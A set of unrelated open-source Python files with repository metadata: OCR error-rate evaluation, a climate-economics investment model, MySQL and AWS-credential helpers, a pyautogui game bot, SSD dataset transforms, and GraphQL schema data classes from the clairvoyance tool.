2796043458 | import argparse
import os
from glob import glob
import json
import jellyfish
from text_extraction import Rectangle, AUTHOR_LABEL, DESCRIPTION_LABEL
import re
import pandas as pd
from tqdm import tqdm
# CLI: -i = folder with the raw OCR json files, -o = folder with the saved
# corrected (ground-truth) json files.
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input-folder", required=True, help="Folder with the json file")
ap.add_argument("-o", "--output-folder", required=True, help="Folder with the saved corrected json files")
args = ap.parse_args()

INPUT_FOLDER = args.input_folder
OUTPUT_FOLDER = args.output_folder

# Evaluate only the cards that have a corrected ground-truth file.
input_elements = sorted([os.path.basename(f) for f in glob(os.path.join(OUTPUT_FOLDER, '*.json'))])
def get_transcription(basename, groundtruth: bool) -> dict:
    """Return {AUTHOR_LABEL: str, DESCRIPTION_LABEL: str} for one card.

    With ``groundtruth=True`` the corrected json saved in OUTPUT_FOLDER is
    loaded directly; otherwise the raw rectangles from INPUT_FOLDER are
    parsed and the first author/description rectangle texts are used
    ('' when no such rectangle exists).
    """
    saved_file = os.path.join(OUTPUT_FOLDER, basename)
    if groundtruth:
        with open(saved_file, 'r') as f:
            return json.load(f)
    else:
        input_file = os.path.join(INPUT_FOLDER, basename)
        rects = Rectangle.load_from_json(input_file)
        return {
            AUTHOR_LABEL: next((r.text for r in rects if r.label == AUTHOR_LABEL), ''),
            DESCRIPTION_LABEL: next((r.text for r in rects if r.label == DESCRIPTION_LABEL), '')
        }
def normalized_str(s):
    """Lower-case *s*, turn punctuation/newlines into spaces and collapse
    whitespace runs, so transcriptions compare on content only."""
    lowered = s.lower()
    # Replace separators (comma, semicolon, dash, dot, newline, parens, quote).
    spaced = re.sub(r"[,;\-\.\n\(\)']", ' ', lowered)
    collapsed = re.sub(' +', ' ', spaced)
    return collapsed.strip()
# Compare ground-truth vs extracted transcriptions per card; accumulate
# Damerau-Levenshtein edit distances (raw and normalized) for CER stats.
results = []
for basename in tqdm(input_elements):
    gt_transcription = get_transcription(basename, groundtruth=True)
    input_transcription = get_transcription(basename, groundtruth=False)
    gt_author, gt_description = gt_transcription[AUTHOR_LABEL], gt_transcription[DESCRIPTION_LABEL]
    extracted_author, extracted_description = input_transcription[AUTHOR_LABEL], input_transcription[DESCRIPTION_LABEL]
    # print(gt_author, gt_description, extracted_author, extracted_description)
    try:
        results.append({
            'basename': basename,
            'author_error': jellyfish.damerau_levenshtein_distance(gt_author, extracted_author),
            'description_error': jellyfish.damerau_levenshtein_distance(gt_description, extracted_description),
            'author_len': len(gt_author),
            'description_len': len(gt_description),
            'author_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_author),
                                                                              normalized_str(extracted_author)),
            'description_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_description),
                                                                                  normalized_str(
                                                                                      extracted_description))
        })
        # Log imperfect author transcriptions for manual inspection.
        if jellyfish.damerau_levenshtein_distance(normalized_str(gt_author), normalized_str(extracted_author))>0:
            print(gt_author, extracted_author)
    except Exception:
        # e.g. non-string fields; report which card failed and carry on
        print(basename)

df = pd.DataFrame.from_records(results)
# CER = total edit distance / total ground-truth length, in percent.
print('CER (author) : {:.2f}'.format(100 * df.author_error.sum() / df.author_len.sum()))
print('CER (description) : {:.2f}'.format(100 * df.description_error.sum() / df.description_len.sum()))
print('CER (author, normalized) : {:.2f}'.format(100 * df.author_error_normalized.sum() / df.author_len.sum()))
print('CER (description, normalized) : {:.2f}'.format(
    100 * df.description_error_normalized.sum() / df.description_len.sum()))
# Fraction of cards transcribed exactly (or within 1 edit).
print('Perfect transcription (author) : {:.2f}'.format(100 * (df.author_error == 0).sum() / len(df)))
print('Perfect transcription (description) : {:.2f}'.format(100 * (df.description_error == 0).sum() / len(df)))
print('Perfect transcription (author, normalized) : {:.2f}'.format(
    100 * (df.author_error_normalized == 0).sum() / len(df)))
print('Perfect transcription (description, normalized) : {:.2f}'.format(
    100 * (df.description_error_normalized == 0).sum() / len(df)))
print('1-away transcription (author) : {:.2f}'.format(100 * (df.author_error <= 1).sum() / len(df)))
print('1-away transcription (description) : {:.2f}'.format(100 * (df.description_error <= 1).sum() / len(df)))
print('1-away transcription (author, normalized) : {:.2f}'.format(
    100 * (df.author_error_normalized <= 1).sum() / len(df)))
print('1-away transcription (description, normalized) : {:.2f}'.format(
    100 * (df.description_error_normalized <= 1).sum() / len(df)))
| paulguhennec/Cini-Project | Process-Images/ocr_evaluation.py | ocr_evaluation.py | py | 4,367 | python | en | code | null | github-code | 36 |
21333145497 | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from climateeconomics.core.core_witness.climateeco_discipline import ClimateEcoDiscipline
from climateeconomics.core.core_witness.macroeconomics_model import MacroEconomics
from sostrades_core.tools.post_processing.charts.two_axes_instanciated_chart import InstanciatedSeries, TwoAxesInstanciatedChart
from sostrades_core.tools.post_processing.charts.chart_filter import ChartFilter
import pandas as pd
import numpy as np
from copy import deepcopy
class InvestDiscipline(ClimateEcoDiscipline):
    """Coupling discipline reconciling the energy-investment trajectories of
    the macro-economy model and the energy-mix model in WITNESS.

    The scaled norm of the difference between both trajectories is exposed
    either as an objective to minimise or as an inequality constraint,
    depending on the ``formulation`` input.
    """

    # ontology information
    _ontology_data = {
        'label': 'WITNESS Investissement Model',
        'type': 'Research',
        'source': 'SoSTrades Project',
        'validated': '',
        'validated_by': 'SoSTrades Project',
        'last_modification_date': '',
        'category': '',
        'definition': '',
        'icon': '',
        'version': '',
    }
    _maturity = 'Research'
    years = np.arange(2020, 2101)

    DESC_IN = {
        'energy_investment_macro': {'type': 'dataframe', 'visibility': 'Shared', 'namespace': 'ns_witness'},
        'energy_investment': {'type': 'dataframe', 'visibility': 'Shared', 'namespace': 'ns_energy_mix'},
        # Scaling factor applied to the difference norm.
        'invest_norm': {'type': 'float', 'default': 10.0},
        # Bug fix: key was misspelled 'possile_values', so the allowed-value
        # check was never registered by the framework.
        'formulation': {'type': 'string', 'default': 'objective', 'possible_values': ['objective', 'constraint']},
        # Tolerance used when 'formulation' is 'constraint'.
        'max_difference': {'type': 'float', 'default': 1.0e-1},
    }

    DESC_OUT = {
        'invest_objective': {'type': 'dataframe', 'visibility': 'Shared', 'namespace': 'ns_witness'},
        'diff_norm': {'type': 'array'}
    }

    def run(self):
        """Compute the scaled investment mismatch and store the outputs."""
        inputs = self.get_sosdisc_inputs()
        # Euclidean norm of the trajectory difference, scaled by invest_norm.
        difference = np.linalg.norm(inputs['energy_investment_macro']['energy_investment'].values -
                                    inputs['energy_investment']['energy_investment'].values) / inputs['invest_norm']
        if inputs['formulation'] == 'objective':
            invest_objective = difference
        elif inputs['formulation'] == 'constraint':
            # Positive when the mismatch is within tolerance.
            invest_objective = inputs['max_difference'] - difference

        dict_values = {'invest_objective': pd.DataFrame(
            {'norm': [invest_objective]}),
            'diff_norm': difference}
        self.store_sos_outputs_values(dict_values)

    def compute_sos_jacobian(self):
        """Analytic gradient of the stored norm w.r.t. both investment inputs.

        d||x||/dx = x / ||x||; the 1/invest_norm scaling appears twice, once
        in the stored norm and once in the outer derivative.
        NOTE(review): for the 'constraint' formulation the stored value is
        max_difference - difference, so dividing by it here (as the original
        code did) may not be the intended derivative — confirm.
        """
        inputs = self.get_sosdisc_inputs()
        invest_objective = self.get_sosdisc_outputs(
            'invest_objective')['norm'].values[0]
        dinvestment = (inputs['energy_investment_macro']['energy_investment'].values -
                       inputs['energy_investment']['energy_investment'].values) / invest_objective / inputs['invest_norm']**2

        self.set_partial_derivative_for_other_types(
            ('invest_objective', 'norm'), ('energy_investment_macro', 'energy_investment'), dinvestment)  # Invest from T$ to G$
        self.set_partial_derivative_for_other_types(
            ('invest_objective', 'norm'), ('energy_investment', 'energy_investment'), -dinvestment)  # Invest from T$ to G$

    def get_chart_filter_list(self):
        """Declare the available post-processing charts."""
        chart_filters = []
        chart_list = ['Difference of investments']
        # First filter to deal with the view : program or actor
        chart_filters.append(ChartFilter(
            'Charts', chart_list, chart_list, 'charts'))
        return chart_filters

    def get_post_processing_list(self, chart_filters=None):
        """Build the selected charts (all charts when no filter is given)."""
        instanciated_charts = []
        # Bug fix: default selection — previously chart_list was undefined
        # when chart_filters was None, raising NameError below.
        chart_list = ['Difference of investments']
        # Overload default value with chart filter
        if chart_filters is not None:
            for chart_filter in chart_filters:
                if chart_filter.filter_key == 'charts':
                    chart_list = chart_filter.selected_values

        if 'Difference of investments' in chart_list:
            energy_investment_macro = self.get_sosdisc_inputs(
                'energy_investment_macro')
            energy_investment = self.get_sosdisc_inputs('energy_investment')
            years = list(energy_investment_macro['years'].values)

            # Chart 1: both trajectories overlaid.
            chart_name = 'Energy investments between macroeconomy output and energy input'
            new_chart = TwoAxesInstanciatedChart(
                'years', 'Investments', chart_name=chart_name)

            energy_investment_series = InstanciatedSeries(
                years, list(energy_investment['energy_investment'].values), 'energy investment (energy)', 'lines')
            new_chart.series.append(energy_investment_series)
            energy_investment_macro_series = InstanciatedSeries(
                years, list(energy_investment_macro['energy_investment'].values), 'energy_investment (macroeconomy)', 'lines')
            new_chart.series.append(energy_investment_macro_series)
            instanciated_charts.append(new_chart)

            # Chart 2: raw difference between the two series.
            chart_name = 'Differences between energy investments'
            new_chart = TwoAxesInstanciatedChart(
                'years', 'Differences of investments', chart_name=chart_name)
            energy_investment_series = InstanciatedSeries(
                years, list(energy_investment_macro['energy_investment'].values - energy_investment['energy_investment'].values), '', 'lines')
            new_chart.series.append(energy_investment_series)
            instanciated_charts.append(new_chart)

        return instanciated_charts
| os-climate/witness-core | climateeconomics/sos_wrapping/sos_wrapping_witness/invest_discipline.py | invest_discipline.py | py | 6,662 | python | en | code | 7 | github-code | 36 |
74601336743 | import mysql.connector
from enc_dec import *
# MySQL 연결 설정
config = {
}
def upsert_db(file_id, share_doc_url):
    """Insert or update the shared-document URL for ``file_id`` in share_doc.

    If a row for ``file_id`` exists, its URL and update timestamp are
    refreshed; otherwise a new row is inserted. Connection and cursor are
    closed in ``finally`` blocks so they no longer leak when a query raises.
    """
    conn = mysql.connector.connect(**config)
    try:
        cursor = conn.cursor()
        try:
            file_id_to_search = file_id
            select_query = "SELECT * FROM share_doc WHERE file_id = %s"
            insert_query = "INSERT INTO share_doc (file_id, share_doc_url) VALUES (%s, %s)"
            # NOTE: 'uptdate' matches the existing column name in the DB schema.
            update_query = "UPDATE share_doc SET share_doc_url = %s, uptdate=now() WHERE file_id = %s"

            # Parameterised queries: safe against SQL injection.
            cursor.execute(select_query, (file_id_to_search,))
            existing_data = cursor.fetchone()

            if existing_data:
                # Row exists: refresh the URL and timestamp.
                new_share_data = share_doc_url
                cursor.execute(update_query, (new_share_data, file_id_to_search))
                conn.commit()
                print(f"데이터가 업데이트되었습니다. (file_id: {file_id_to_search})")
            else:
                # No row yet: insert a fresh one.
                share_data_to_insert = share_doc_url
                cursor.execute(insert_query, (file_id_to_search, share_data_to_insert))
                conn.commit()
                print(f"데이터가 삽입되었습니다. (file_id: {file_id_to_search})")
        finally:
            cursor.close()
    finally:
        conn.close()
def delete_db(file_id):
    """Delete the share_doc row for ``file_id`` (no-op if absent).

    Connection and cursor are closed in ``finally`` blocks so they no
    longer leak when the query raises.
    """
    conn = mysql.connector.connect(**config)
    try:
        cursor = conn.cursor()
        try:
            # Parameterised query: safe against SQL injection.
            delete_query = "DELETE FROM share_doc WHERE file_id = %s"
            cursor.execute(delete_query, (file_id,))
            conn.commit()
        finally:
            cursor.close()
    finally:
        conn.close()
# Decrypted AWS credentials, kept as module globals for backward
# compatibility with existing callers.
a = ''
b = ''


def get_aws():
    """Return the decrypted (access key, secret key) pair for this licence.

    Reads the local licence key, looks up the matching encrypted AWS
    credentials in ``awsk_mgmt`` and decrypts them with the same key.
    The module globals ``a`` and ``b`` are refreshed as a side effect.
    """
    global a
    global b
    # The licence key doubles as decryption key and DB lookup value.
    with open("c:/pdf/license/license.key", "rb") as key_file:
        key = key_file.read()
    conn = mysql.connector.connect(**config)
    try:
        cursor = conn.cursor()
        try:
            select_query = "SELECT * FROM awsk_mgmt WHERE enc_key = %s"
            cursor.execute(select_query, (key,))
            existing_data = cursor.fetchone()
            # Columns 1 and 2 hold the encrypted access/secret keys.
            a = get_dec_awsacckey(key, existing_data[1])
            b = get_dec_awsacckey(key, existing_data[2])
        finally:
            cursor.close()
    finally:
        conn.close()
    return (a, b)
if __name__ == "__main__":
    # Smoke test: fetch and print the decrypted AWS credential pair.
    empty_tuple = get_aws()
    print(empty_tuple[0])
    print(empty_tuple[1])
24643182429 | import pyautogui
import time
# Locating the game window: the user marks its two corners manually.
pyautogui.alert('Put the mouse pointer over the top left corner of the game then press "Enter"')
TOP_LEFT = pyautogui.position()
pyautogui.alert('Put the mouse pointer over the bottom right corner of the game then press "Enter"')
BOT_RIGHT = pyautogui.position()
# Window size in pixels (width, height).
DIM = (BOT_RIGHT[0] - TOP_LEFT[0], BOT_RIGHT[1] - TOP_LEFT[1])
print(TOP_LEFT, BOT_RIGHT, DIM)

# Generating the positions.
# Skill buttons lie on a horizontal strip at 90% of the window height.
QSKILL = (0.3 * DIM[0] + TOP_LEFT[0], 0.9 * DIM[1] + TOP_LEFT[1])
WSKILL = (0.4 * DIM[0] + TOP_LEFT[0], 0.9 * DIM[1] + TOP_LEFT[1])
ESKILL = (0.5 * DIM[0] + TOP_LEFT[0], 0.9 * DIM[1] + TOP_LEFT[1])
RSKILL = (0.6 * DIM[0] + TOP_LEFT[0], 0.9 * DIM[1] + TOP_LEFT[1])
SKILLS = [QSKILL, WSKILL, ESKILL, RSKILL]
# Inventory grid: 6 rows x 5 columns, window-relative coordinates.
SLOTZ = [[((0.1 + (i * 0.07)) * DIM[0] + TOP_LEFT[0], (0.26 + (j * 0.125)) * DIM[1] + TOP_LEFT[1]) for i in range(5)] for j in range(6)]
# Flattened; index 0 is a placeholder so slot numbers are 1-based.
SLOTS = [None, ]
for line in SLOTZ:
    SLOTS += line
# Tool functions
def use(slot, chest=False):
    """Click inventory ``slot``, then the 'use' entry of its context menu.

    When ``chest`` is True an extra confirmation click is issued at the
    centre-right of the window (presumably the chest-opening dialog —
    TODO confirm in-game).
    """
    pyautogui.moveTo(SLOTS[slot][0], SLOTS[slot][1])
    time.sleep(.1)
    pyautogui.click()
    # The context-menu entry sits at a fixed offset from the slot.
    pyautogui.moveRel(0.194 * DIM[0], 0.185 * DIM[1])
    time.sleep(.1)
    pyautogui.click()
    if chest:
        pyautogui.moveTo(0.7 * DIM[0] + TOP_LEFT[0], 0.5 * DIM[1] + TOP_LEFT[1])
        time.sleep(.4)
        pyautogui.click()
def sell(slot):
    """Sell the item in inventory ``slot`` via the captured sell button.

    Requires 'sell_button.png' (screenshotted in the main menu loop) to be
    on disk. Bug fix: locateCenterOnScreen returns None when the button is
    not found (older pyautogui versions), which previously crashed on
    ``pos[0]`` — now the slot is simply skipped.
    """
    pyautogui.click(SLOTS[slot][0], SLOTS[slot][1])
    time.sleep(.4)
    pos = pyautogui.locateCenterOnScreen('sell_button.png', region=(SLOTS[slot][0], SLOTS[slot][1], DIM[0] / 4, DIM[1] / 2), grayscale=True)
    print(pos)
    if pos is None:
        # Button not visible for this slot (e.g. empty slot): do nothing.
        return
    pyautogui.click(pos[0], pos[1])
def equip(slot):
    """Click inventory ``slot``, then the 'equip' entry of its context menu.

    Same pattern as use(), with a slightly different menu offset.
    """
    pyautogui.moveTo(SLOTS[slot][0], SLOTS[slot][1])
    time.sleep(.1)
    pyautogui.click()
    pyautogui.moveRel(0.192 * DIM[0], 0.198 * DIM[1])
    time.sleep(.1)
    pyautogui.click()
def open_chest(slot, n):
    """Use the chest sitting in inventory ``slot`` ``n`` times in a row."""
    for _ in range(n):
        use(slot, chest=True)
# Main interactive menu loop.
running = True
while running:
    userinput = pyautogui.prompt(text='1 - Open Chests \n2 - Sell items\n 9 - Quit', title='What do you want to do ?')
    if userinput == '1':
        # Input like "5 20": open 20 chests from slot 5.
        i = pyautogui.prompt(text='Print the slot number (1 to 30) of the chest followed by the number of chests to open. Example : 5 20').split()
        open_chest(int(i[0]), int(i[1]))
    elif userinput == '2':
        # Capture the sell button once so sell() can locate it on screen.
        pyautogui.alert('Put the mouse pointer over the "SELL" button then press "Enter"')
        pos = pyautogui.position()
        pyautogui.screenshot('sell_button.png', region=(pos[0], pos[1], 100, 50))
        i = pyautogui.prompt(text='Write the starting and end slot (inclusive) of the items you want to sell, EVERYTHING in between will be sold !').split()
        start, end = int(i[0]), int(i[1])
        for slot in range(start, end + 1):
            sell(slot)
            time.sleep(.1)
    else:
        # NOTE(review): any other input exits, not only the advertised '9'.
        running = False
74059611623 | from configs import ssd300 as cfg
import torch
import torchvision.transforms as transforms
def base_transform(size):
    """Build a torchvision pipeline that resizes a PIL image to ``size``
    and converts it to a float tensor scaled to [0, 1]."""
    transform = transforms.Compose([
        transforms.Resize(size),
        transforms.ToTensor()
    ])
    return transform
class BaseTransform:
    """Callable transform with the (image, boxes, labels) interface shared
    by the dataset transforms in this file."""

    def __init__(self, size, mean):
        self.size = size
        # ``mean`` kept for interface compatibility; resize+ToTensor does not
        # use it. TODO(review): subtract it if mean normalisation is wanted.
        self.mean = mean

    def __call__(self, image, boxes=None, labels=None):
        # Bug fix: the previous version returned the Compose object itself
        # (ignoring ``image``); now the pipeline is applied to the image.
        return base_transform(self.size)(image), boxes, labels
class VOCAnnotationTransform(object):
    """Transforms a VOC annotation into a list of bbox coords and label index.

    Initialized with a dictionary lookup of classnames to indexes.

    Arguments:
        class_to_ind (dict, optional): dictionary lookup of classnames -> indexes
            (default: alphabetic indexing of VOC's 20 classes)
        keep_difficult (bool, optional): keep difficult instances or not
            (default: False)
    """

    def __init__(self, class_to_ind=None, keep_difficult=False):
        self.class_to_ind = class_to_ind or dict(
            zip(cfg.VOC_CLASSES, range(len(cfg.VOC_CLASSES))))
        self.keep_difficult = keep_difficult

    def __call__(self, target, width, height):
        """
        Arguments:
            target (annotation) : the target annotation to be made usable
                will be an ET.Element
            width (int): image width, used to normalise x coordinates
            height (int): image height, used to normalise y coordinates
        Returns:
            a list containing lists of bounding boxes [bbox coords, class index]
        """
        res = []
        for obj in target.iter('object'):
            difficult = int(obj.find('difficult').text) == 1
            if not self.keep_difficult and difficult:
                # Skip objects flagged as hard unless explicitly requested.
                continue
            name = obj.find('name').text.lower().strip()
            bbox = obj.find('bndbox')

            pts = ['xmin', 'ymin', 'xmax', 'ymax']
            bndbox = []
            for i, pt in enumerate(pts):
                # VOC coordinates are 1-based; shift to 0-based.
                cur_pt = int(bbox.find(pt).text) - 1
                # scale x by width, y by height (normalise to [0, 1])
                cur_pt = cur_pt / width if i % 2 == 0 else cur_pt / height
                bndbox.append(cur_pt)
            label_idx = self.class_to_ind[name]
            bndbox.append(label_idx)
            res += [bndbox]  # [xmin, ymin, xmax, ymax, label_ind]
            # img_id = target.find('filename').text[:-4]

        return res  # [[xmin, ymin, xmax, ymax, label_ind], ... ]
| alswlsghd320/SSD_pytorch | datasets/transforms.py | transforms.py | py | 2,372 | python | en | code | 1 | github-code | 36 |
40126491559 | import json
from typing import Any, Dict, List, Optional, Set
from clairvoyance.entities import GraphQLPrimitive
from clairvoyance.entities.context import log
from clairvoyance.entities.primitives import GraphQLKind
class Schema:
    """Host of the introspection data.

    Holds the root operation type names, directives and the map of
    discovered types (``self.types``), either parsed from a full
    introspection response or built incrementally during fuzzing.
    """

    def __init__(
        self,
        query_type: str = None,
        mutation_type: str = None,
        subscription_type: str = None,
        schema: Dict[str, Any] = None,
    ):
        # Two construction modes: from an existing introspection response,
        # or empty (root types + builtin scalars only) for incremental use.
        if schema:
            self._schema = {
                'directives': schema['data']['__schema']['directives'],
                'mutationType': schema['data']['__schema']['mutationType'],
                'queryType': schema['data']['__schema']['queryType'],
                'subscriptionType': schema['data']['__schema']['subscriptionType'],
                'types': [],
            }
            self.types = {}
            for t in schema['data']['__schema']['types']:
                typ = Type.from_json(t)
                self.types[typ.name] = typ
        else:
            self.query_type = {'name': query_type} if query_type else None
            self.mutation_type = {'name': mutation_type} if mutation_type else None
            self.subscription_type = ({'name': subscription_type} if subscription_type else None)
            self._schema = {
                'directives': [],
                'queryType': self.query_type,
                'mutationType': self.mutation_type,
                'subscriptionType': self.subscription_type,
                'types': [],
            }
            # Builtin scalars every schema is assumed to have.
            self.types = {
                GraphQLPrimitive.STRING: Type(
                    name=GraphQLPrimitive.STRING,
                    kind=GraphQLKind.SCALAR,
                ),
                GraphQLPrimitive.ID: Type(
                    name=GraphQLPrimitive.ID,
                    kind=GraphQLKind.SCALAR,
                ),
            }
            if query_type:
                self.add_type(query_type, 'OBJECT')
            if mutation_type:
                self.add_type(mutation_type, 'OBJECT')
            if subscription_type:
                self.add_type(subscription_type, 'OBJECT')

    def add_type(
        self,
        name: str,
        kind: str,
    ) -> None:
        """Add type ``name`` to the schema if it does not exist already."""
        if name not in self.types:
            typ = Type(name=name, kind=kind)
            self.types[name] = typ

    def __repr__(self) -> str:
        """Full introspection-style JSON representation of the schema."""
        schema = {'data': {'__schema': self._schema}}
        for t in self.types.values():
            schema['data']['__schema']['types'].append(t.to_json())
        output = json.dumps(schema, indent=4, sort_keys=True)
        return output

    def get_path_from_root(
        self,
        name: str,
    ) -> List[str]:
        """Getting path starting from root.

        The algorithm explores the schema in a DFS manner. It uses a set to
        keep track of visited (type, field) edges, and a list for the path.
        Tracking visited edges is necessary to avoid infinite loops (i.e.
        recursions in the schema). If a full iteration over the types is made
        without finding a match, the schema is not connected and the path
        cannot be found.
        """
        log().debug(f'Entered get_path_from_root({name})')
        path_from_root: List[str] = []
        if name not in self.types:
            raise Exception(f'Type \'{name}\' not in schema!')

        # Candidate root type names (empty entries filtered out).
        roots = [
            self._schema['queryType']['name'] if self._schema['queryType'] else '',
            self._schema['mutationType']['name'] if self._schema['mutationType'] else '',
            self._schema['subscriptionType']['name'] if self._schema['subscriptionType'] else '',
        ]
        roots = [r for r in roots if r]

        visited = set()
        initial_name = name
        # Walk backwards: find a field whose type is `name`, prepend it, and
        # continue from the owning type until a root is reached.
        while name not in roots:
            found = False
            for t in self.types.values():
                for f in t.fields:
                    key = f'{t.name}.{f.name}'
                    if key in visited:
                        continue
                    if f.type.name == name:
                        path_from_root.insert(0, f.name)
                        visited.add(key)
                        name = t.name
                        found = True
            if not found:
                log().debug('get_path_from_root: Ran an iteration with no matches found')
                raise Exception(f'Could not find path from root to \'{initial_name}\' \nCurrent path: {path_from_root}')

        # Prepend queryType or mutationType
        path_from_root.insert(0, name)
        return path_from_root

    def get_type_without_fields(
        self,
        ignored: Set[str] = None,
    ) -> str:
        """Return the name of a type with no discovered fields yet.

        INPUT_OBJECT types and names in ``ignored`` are skipped; returns ''
        when every type already has fields.
        """
        ignored = ignored or set()
        for t in self.types.values():
            if not t.fields and t.name not in ignored and t.kind != GraphQLKind.INPUT_OBJECT:
                return t.name
        return ''

    def convert_path_to_document(
        self,
        path: List[str],
    ) -> str:
        """Convert a root-to-type field path into a GraphQL document whose
        innermost selection is the placeholder 'FUZZ'."""
        log().debug(f'Entered convert_path_to_document({path})')
        doc = 'FUZZ'
        # Wrap from the innermost field outwards; path[0] stays as the root.
        while len(path) > 1:
            doc = f'{path.pop()} {{ {doc} }}'
        if self._schema['queryType'] and path[0] == self._schema['queryType']['name']:
            doc = f'query {{ {doc} }}'
        elif self._schema['mutationType'] and path[0] == self._schema['mutationType']['name']:
            doc = f'mutation {{ {doc} }}'
        elif self._schema['subscriptionType'] and path[0] == self._schema['subscriptionType']['name']:
            doc = f'subscription {{ {doc} }}'
        else:
            raise Exception('Unknown operation type')
        return doc
class TypeRef:
    """Reference to a GraphQL type, including LIST / NON_NULL wrapping."""

    def __init__(
        self,
        name: str,
        kind: str,
        is_list: bool = False,
        non_null_item: bool = False,
        non_null: bool = False,
    ) -> None:
        # NON_NULL list *items* only make sense inside a LIST wrapper.
        if non_null_item and not is_list:
            raise Exception('elements can\'t be NON_NULL if TypeRef is not LIST')
        # NOTE: assignment order matters — __str__ renders self.__dict__.
        self.name = name
        self.kind = kind
        self.is_list = is_list
        self.non_null = non_null
        self.list = self.is_list  # legacy alias kept for compatibility
        self.non_null_item = non_null_item

    def __eq__(self, other: Any) -> bool:
        if not isinstance(other, TypeRef):
            return False
        return all(value == other.__dict__[attr] for attr, value in self.__dict__.items())

    def __str__(self) -> str:
        return str(self.__dict__)

    def to_json(self) -> Dict[str, Any]:
        """Serialise to introspection JSON, applying wrappers inside-out:
        NON_NULL(item) -> LIST -> NON_NULL(list)."""
        wrapped: Dict[str, Any] = {'kind': self.kind, 'name': self.name, 'ofType': None}
        if self.non_null_item:
            wrapped = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': wrapped}
        if self.list:
            wrapped = {'kind': GraphQLKind.LIST, 'name': None, 'ofType': wrapped}
        if self.non_null:
            wrapped = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': wrapped}
        return wrapped
class InputValue:
    """A GraphQL argument: a name plus the TypeRef of its type."""

    def __init__(
        self,
        name: str,
        typ: TypeRef,
    ) -> None:
        self.name = name
        self.type = typ

    def __str__(self) -> str:
        return f'{{ \'name\': {self.name}, \'type\': {str(self.type)} }}'

    def to_json(self) -> dict:
        # Introspection shape; description/defaultValue are never recovered
        # by fuzzing, hence always None.
        return {
            'defaultValue': None,
            'description': None,
            'name': self.name,
            'type': self.type.to_json(),
        }

    @classmethod
    def from_json(
        cls,
        _json: Dict[str, Any],
    ) -> 'InputValue':
        """Build an InputValue from an introspection JSON node."""
        return cls(
            name=_json['name'],
            typ=field_or_arg_type_from_json(_json['type']),
        )
def field_or_arg_type_from_json(_json: Dict[str, Any]) -> 'TypeRef':
    """Parse an introspection ``type`` JSON node into a TypeRef.

    Handles up to three wrapper levels — NON_NULL(LIST(NON_NULL(base))) —
    which is the deepest shape GraphQL introspection produces for a
    field/argument type.

    Raises:
        Exception: on an unexpected wrapper kind or deeper nesting.
    """
    typ = None
    if _json['kind'] not in [GraphQLKind.NON_NULL, GraphQLKind.LIST]:
        # Bare (unwrapped) named type.
        typ = TypeRef(
            name=_json['name'],
            kind=_json['kind'],
        )
    elif not _json['ofType']['ofType']:
        # One wrapper: NON_NULL(base) or LIST(base).
        actual_type = _json['ofType']
        if _json['kind'] == GraphQLKind.NON_NULL:
            typ = TypeRef(
                name=actual_type['name'],
                kind=actual_type['kind'],
                non_null=True,
            )
        elif _json['kind'] == GraphQLKind.LIST:
            typ = TypeRef(
                name=actual_type['name'],
                kind=actual_type['kind'],
                is_list=True,
            )
        else:
            raise Exception(f'Unexpected type.kind: {_json["kind"]}')
    elif not _json['ofType']['ofType']['ofType']:
        # Two wrappers.
        actual_type = _json['ofType']['ofType']
        if _json['kind'] == GraphQLKind.NON_NULL:
            # NON_NULL(LIST(base)): the list itself is non-null, items are
            # nullable. (Consistency fix: was opaque positional
            # TypeRef(..., True, False, True).)
            typ = TypeRef(
                name=actual_type['name'],
                kind=actual_type['kind'],
                is_list=True,
                non_null=True,
            )
        elif _json['kind'] == GraphQLKind.LIST:
            # LIST(NON_NULL(base)): nullable list of non-null items.
            typ = TypeRef(
                name=actual_type['name'],
                kind=actual_type['kind'],
                is_list=True,
                non_null_item=True,
            )
        else:
            raise Exception(f'Unexpected type.kind: {_json["kind"]}')
    elif not _json['ofType']['ofType']['ofType']['ofType']:
        # Three wrappers: NON_NULL(LIST(NON_NULL(base))).
        actual_type = _json['ofType']['ofType']['ofType']
        typ = TypeRef(
            name=actual_type['name'],
            kind=actual_type['kind'],
            is_list=True,
            non_null_item=True,
            non_null=True,
        )
    else:
        raise Exception('Invalid field or arg (too many \'ofType\')')
    return typ
class Field:
    """A GraphQL field: name, result type and argument list."""

    def __init__(
        self,
        name: str,
        typeref: Optional[TypeRef],
        args: List[InputValue] = None,
    ):
        # A field without a resolvable type is unusable — fail fast.
        if not typeref:
            raise Exception(f'Can\'t create {name} Field from {typeref} TypeRef.')
        self.name = name
        self.type = typeref
        self.args = args or []

    def to_json(self) -> dict:
        # Introspection shape; deprecation info is never recovered.
        return {
            'args': [arg.to_json() for arg in self.args],
            'deprecationReason': None,
            'description': None,
            'isDeprecated': False,
            'name': self.name,
            'type': self.type.to_json(),
        }

    @classmethod
    def from_json(cls, _json: Dict[str, Any]) -> 'Field':
        """Build a Field (including its args) from an introspection node."""
        parsed_args = [InputValue.from_json(arg) for arg in _json['args']]
        return cls(_json['name'], field_or_arg_type_from_json(_json['type']), parsed_args)
class Type:
    """A named GraphQL type and its (input) fields."""

    def __init__(
        self,
        name: str = '',
        kind: str = '',
        fields: List[Field] = None,
    ):
        self.name = name
        self.kind = kind
        self.fields: List[Field] = fields or []

    def to_json(self) -> Dict[str, Any]:
        # dirty hack: consumers expect at least one field, so fieldless
        # types get a placeholder 'dummy' String field. NOTE(review): this
        # mutates self.fields as a side effect; from_json strips it again.
        if not self.fields:
            field_typeref = TypeRef(
                name=GraphQLPrimitive.STRING,
                kind=GraphQLKind.SCALAR,
            )
            dummy = Field('dummy', field_typeref)
            self.fields.append(dummy)

        output: Dict[str, Any] = {
            'description': None,
            'enumValues': None,
            'interfaces': [],
            'kind': self.kind,
            'name': self.name,
            'possibleTypes': None,
        }

        # OBJECT/INTERFACE expose 'fields'; INPUT_OBJECT exposes 'inputFields'.
        if self.kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
            output['fields'] = [f.to_json() for f in self.fields]
